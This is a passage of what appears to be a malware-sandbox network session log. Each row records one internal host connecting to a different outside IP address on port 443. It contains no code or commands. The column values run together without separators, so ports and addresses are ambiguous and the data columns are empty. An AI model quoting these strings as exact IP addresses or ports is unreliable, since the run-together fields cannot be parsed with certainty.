                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24999192.168.2.233413257.98.49.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25000192.168.2.233358696.138.177.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25001192.168.2.235315223.252.123.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25002192.168.2.2354144110.134.136.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25003192.168.2.234834887.117.243.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25004192.168.2.234755638.58.199.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25005192.168.2.234082085.183.128.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25006192.168.2.2354780189.231.94.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25007192.168.2.2347116146.75.36.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25008192.168.2.2335200223.252.106.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25009192.168.2.235556035.57.178.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25010192.168.2.23434329.153.24.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25011192.168.2.235328074.129.214.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25012192.168.2.235997898.52.218.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25013192.168.2.233320246.12.13.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25014192.168.2.234378267.229.239.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25015192.168.2.2337588131.78.74.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25016192.168.2.2359070180.6.191.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25017192.168.2.235526891.249.66.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25018192.168.2.2350208171.204.244.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25019192.168.2.2338642110.87.74.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25020192.168.2.2337722105.34.7.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25021192.168.2.2334174150.64.174.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25022192.168.2.235799687.146.138.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25023192.168.2.234420041.96.16.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25024192.168.2.2343896116.64.139.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25025192.168.2.2341990207.31.185.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25026192.168.2.2342118155.173.189.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25027192.168.2.233725432.42.52.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25028192.168.2.234492049.224.87.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25029192.168.2.233584460.222.66.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25030192.168.2.235260452.110.194.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25031192.168.2.233609491.171.98.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25032192.168.2.2341272114.50.209.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25033192.168.2.2336672133.44.128.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25034192.168.2.235592848.200.55.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25035192.168.2.233596274.1.123.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25036192.168.2.235905012.238.110.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25037192.168.2.2354498169.112.114.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25038192.168.2.235576096.28.213.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25039192.168.2.2335252188.242.136.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25040192.168.2.234456290.216.196.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25041192.168.2.2343958221.218.174.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25042192.168.2.233507844.162.46.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25043192.168.2.233672494.201.85.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25044192.168.2.2354262187.71.60.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25045192.168.2.2342892221.201.52.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25046192.168.2.2336910175.195.106.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25047192.168.2.2341876222.215.23.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25048192.168.2.2346810202.2.170.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25049192.168.2.2351316131.136.123.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25050192.168.2.234147874.134.175.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25051192.168.2.2334184201.133.158.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25052192.168.2.2353560193.135.58.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25053192.168.2.23395925.144.240.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25054192.168.2.236071679.229.250.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25055192.168.2.2356532123.131.195.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25056192.168.2.2351280190.112.7.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25057192.168.2.235713678.155.91.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25058192.168.2.2344050210.83.101.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25059192.168.2.235598273.247.45.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25060192.168.2.235756859.245.170.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25061192.168.2.2332830200.130.31.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25062192.168.2.2359396125.230.8.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25063192.168.2.233822284.105.77.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25064192.168.2.2344576149.92.222.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25065192.168.2.2336468208.142.50.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25066192.168.2.2338286136.217.95.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25067192.168.2.2355638223.223.80.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25068192.168.2.2333012198.67.148.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25069192.168.2.234476669.75.37.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25070192.168.2.233371827.147.248.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25071192.168.2.233610282.114.19.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25072192.168.2.2353616192.188.107.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25073192.168.2.2347090125.5.46.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25074192.168.2.2339180205.101.230.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25075192.168.2.2357106144.38.73.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25076192.168.2.2350884216.165.182.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25077192.168.2.2352832146.80.77.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25078192.168.2.2360758171.87.63.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25079192.168.2.2353784216.4.245.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25080192.168.2.235379672.237.11.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25081192.168.2.2343044167.112.144.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25082192.168.2.233591874.8.74.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25083192.168.2.233563491.41.147.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25084192.168.2.2351832123.253.142.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25085192.168.2.234493864.75.149.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25086192.168.2.2340046163.191.166.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25087192.168.2.234124081.145.213.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25088192.168.2.2339294114.117.25.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25089192.168.2.2346718178.66.243.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25090192.168.2.2335588137.246.52.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25091192.168.2.2344320137.61.254.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25092192.168.2.2355438133.90.180.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25093192.168.2.2349266222.14.202.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25094192.168.2.2333210139.128.111.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25095192.168.2.233965068.32.100.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25096192.168.2.2341512172.94.192.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25097192.168.2.234002064.113.84.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25098192.168.2.233661219.54.144.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25099192.168.2.234705012.217.141.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25100192.168.2.2335824184.64.13.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25101192.168.2.23559221.157.20.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25102192.168.2.2347536165.93.227.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25103192.168.2.233923669.81.210.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25104192.168.2.2343872202.234.124.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25105192.168.2.234984250.91.102.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25106192.168.2.2343492135.112.157.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25107192.168.2.233901695.166.207.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25108192.168.2.2333830203.201.163.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25109192.168.2.233714441.17.98.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25110192.168.2.235763286.6.222.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25111192.168.2.233286612.87.62.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25112192.168.2.2338442212.255.107.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25113192.168.2.2342310222.142.232.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25114192.168.2.2337250199.236.154.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25115192.168.2.2344884153.88.236.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25116192.168.2.2335942200.156.182.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25117192.168.2.2337784170.158.87.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25118192.168.2.235795446.186.170.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25119192.168.2.235679885.166.196.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25120192.168.2.2352144119.126.192.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25121192.168.2.2344498162.235.198.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25122192.168.2.234602236.191.36.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25123192.168.2.2357124165.108.56.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25124192.168.2.233455087.46.178.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25125192.168.2.235653452.52.220.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25126192.168.2.2347138212.212.67.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25127192.168.2.233914492.58.179.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25128192.168.2.2348320138.125.230.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25129192.168.2.235085231.178.114.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25130192.168.2.2349274109.60.187.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25131192.168.2.2345618118.163.213.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25132192.168.2.2346086165.251.123.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25133192.168.2.233670834.3.141.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25134192.168.2.2336474157.187.176.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25135192.168.2.23469769.169.174.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25136192.168.2.2342342137.128.109.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25137192.168.2.2359016206.145.175.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25138192.168.2.2339198116.174.122.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25139192.168.2.2340280105.54.8.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25140192.168.2.2359946136.193.31.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25141192.168.2.2350734116.116.4.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25142192.168.2.233423058.211.116.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25143192.168.2.2357934218.74.190.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25144192.168.2.2358722164.162.44.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25145192.168.2.233538019.5.214.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25146192.168.2.2335320152.50.218.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25147192.168.2.233839278.111.190.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25148192.168.2.2341126147.200.189.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25149192.168.2.235907467.114.173.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25150192.168.2.2351614131.163.75.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25151192.168.2.233481231.127.152.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25152192.168.2.233713062.224.55.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25153192.168.2.234324654.155.101.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25154192.168.2.235647653.244.236.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25155192.168.2.2337358204.14.26.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25156192.168.2.2342696192.242.27.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25157192.168.2.234154668.198.155.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25158192.168.2.2346530102.47.64.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25159192.168.2.2340160213.88.238.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25160192.168.2.2358668216.109.212.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25161192.168.2.233943420.162.107.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25162192.168.2.2355138166.157.89.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25163192.168.2.2333432191.241.224.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25164192.168.2.2346274190.24.236.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25165192.168.2.2349834133.64.163.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25166192.168.2.2349322174.223.187.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25167192.168.2.2354532111.210.218.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25168192.168.2.2342750152.70.253.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25169192.168.2.235500663.126.85.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25170192.168.2.234803679.122.3.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25171192.168.2.234942463.52.55.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25172192.168.2.23450348.40.41.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25173192.168.2.2334994185.65.205.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25174192.168.2.2346898190.110.165.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25175192.168.2.2339364175.8.202.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25176192.168.2.234081439.180.69.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25177192.168.2.235270674.61.81.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25178192.168.2.2359632188.43.3.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25179192.168.2.235856293.184.10.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25180192.168.2.233454242.64.238.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25181192.168.2.2348902121.7.60.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25182192.168.2.234136857.93.16.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25183192.168.2.2352302206.115.207.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25184192.168.2.2356180170.120.17.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25185192.168.2.2339208132.84.245.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25186192.168.2.235702886.147.58.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25187192.168.2.2341208117.162.253.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25188192.168.2.2332910151.154.128.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25189192.168.2.235338467.209.99.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25190192.168.2.2334326221.168.141.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25191192.168.2.2354140165.63.224.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25192192.168.2.234468859.156.5.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25193192.168.2.234137659.101.147.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25194192.168.2.233898685.191.62.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25195192.168.2.2360816211.46.69.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25196192.168.2.233954435.19.151.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25197192.168.2.233770612.211.135.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25198192.168.2.2334962170.10.88.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25199192.168.2.2350684117.29.50.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25200192.168.2.234044275.248.116.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25201192.168.2.235599420.144.164.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25202192.168.2.235979243.231.34.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25203192.168.2.233299277.164.45.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25204192.168.2.2358486146.221.110.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25205192.168.2.2351384129.160.60.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25206192.168.2.2351962187.0.45.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25207192.168.2.234721249.208.10.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25208192.168.2.2337974167.73.129.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25209192.168.2.234093268.111.136.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25210192.168.2.233655848.150.128.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25211192.168.2.235974477.179.52.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25212192.168.2.2358762181.81.150.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25213192.168.2.235494297.93.28.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25214192.168.2.23500881.127.120.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25215192.168.2.235448864.233.138.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25216192.168.2.2338554199.138.39.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25217192.168.2.234390694.39.240.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25218192.168.2.235586273.57.105.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25219192.168.2.233842466.171.75.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25220192.168.2.2358306166.151.106.95443
